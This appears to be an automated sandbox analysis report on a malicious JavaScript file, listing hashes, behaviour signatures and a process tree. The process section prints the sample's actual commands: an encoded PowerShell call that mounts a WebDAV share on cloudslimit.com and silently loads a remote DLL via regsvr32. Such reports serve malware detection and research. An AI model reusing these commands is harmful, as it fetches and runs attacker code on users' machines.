Analysis
-
max time kernel
14s -
max time network
21s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
25/07/2024, 21:27
Static task
static1
Behavioral task
behavioral1
Sample
234912348282128518.js
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
234912348282128518.js
Resource
win10v2004-20240709-en
General
-
Target
234912348282128518.js
-
Size
19KB
-
MD5
6efedd2ed0f8a1216d81738bab9b4a48
-
SHA1
ae06acf250e040287b9ca9bce64e6094d2e7b06b
-
SHA256
643297279e5562c1772337378280d71b6598da278a16a970305358032bf53c22
-
SHA512
2432ae65749b12c49be23739124c12bce51a645df2698b531fe54252002bff967c88396d0cc50ba8acf9abec6f85d70a7f49f778795796d64412ecc7d9981624
-
SSDEEP
384:Qpa7OzAAdNa0w88YUIwNSw6aRByUGmzZAd6ngm:Qpa7OUWa0w88YUIASw6aRByUGmzZAd6F
Malware Config
Signatures
-
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2444 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2444 powershell.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 1972 wrote to memory of 2444 1972 wscript.exe 29 PID 1972 wrote to memory of 2444 1972 wscript.exe 29 PID 1972 wrote to memory of 2444 1972 wscript.exe 29 PID 2444 wrote to memory of 2100 2444 powershell.exe 31 PID 2444 wrote to memory of 2100 2444 powershell.exe 31 PID 2444 wrote to memory of 2100 2444 powershell.exe 31 PID 2444 wrote to memory of 3064 2444 powershell.exe 32 PID 2444 wrote to memory of 3064 2444 powershell.exe 32 PID 2444 wrote to memory of 3064 2444 powershell.exe 32 PID 2444 wrote to memory of 3064 2444 powershell.exe 32 PID 2444 wrote to memory of 3064 2444 powershell.exe 32
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\234912348282128518.js1⤵
- Suspicious use of WriteProcessMemory
PID:1972 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABjAGwAbwB1AGQAcwBsAGkAbQBpAHQALgBjAG8AbQBAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAIAA7ACAAcgBlAGcAcwB2AHIAMwAyACAALwBzACAAXABcAGMAbABvAHUAZABzAGwAaQBtAGkAdAAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAyADQANgAzADkAMgA3ADQAMwA3ADgAOAA1ADUALgBkAGwAbAA=2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2444 -
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" use \\cloudslimit.com@8888\davwwwroot\3⤵PID:2100
-
-
C:\Windows\system32\regsvr32.exe"C:\Windows\system32\regsvr32.exe" /s \\cloudslimit.com@8888\davwwwroot\24639274378855.dll3⤵PID:3064
-
-